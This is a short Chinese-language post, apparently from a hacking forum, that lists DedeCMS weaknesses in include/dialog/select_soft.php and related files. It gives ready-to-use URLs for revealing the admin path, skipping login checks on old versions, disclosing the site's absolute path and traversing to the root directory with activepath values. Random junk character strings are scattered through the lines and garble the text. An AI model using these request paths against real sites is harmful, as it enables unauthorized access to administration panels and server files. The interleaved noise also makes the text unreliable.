1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理; o1 w4 Z1 o; C
u& Y$ s! _' c% L R( L员帐号,新版本的就直接转向了后台.. c' _: i' I8 |
7 z& h# _. }/ \( v. G! @. Z2.include/dialog/config.php会爆出后台管理路径
8 y$ X$ T5 S7 g; p4 O/ N( P0 @3 B; Y K6 ^5 M$ y6 i- g
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录3 n. B \, Y8 Y$ q) G/ x
% f* k% Z7 |7 Z4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
9 i5 N& Z e; R k" x0 f. B
$ M; t+ v1 g% @5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉2 `/ U8 k, w* z
& M9 L* n. M& Q5 r4 U& m: h到根目录去.不过这些版本的访问地址有些不同.. `0 ^% ^1 g4 c. |% ~6 }
地址为require/dialog/select_soft.php?activepath=/././././././././
$ X4 V5 @" I2 G2 b. S8 C6 u* i
8 Z! A E/ X1 M$ m: S5 Iinclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..3 X' ^* |/ c a1 y& W
存在相同问题的文件还有3 |7 k$ V$ x: A' `( l- Y V5 v
include\dialog\select_images.php1 q* W: L7 ]( ~7 l2 c
include\dialog\select_media.php
# ^/ n9 S x" `include\dialog\select_templets.php
1 `" f+ f# I5 z |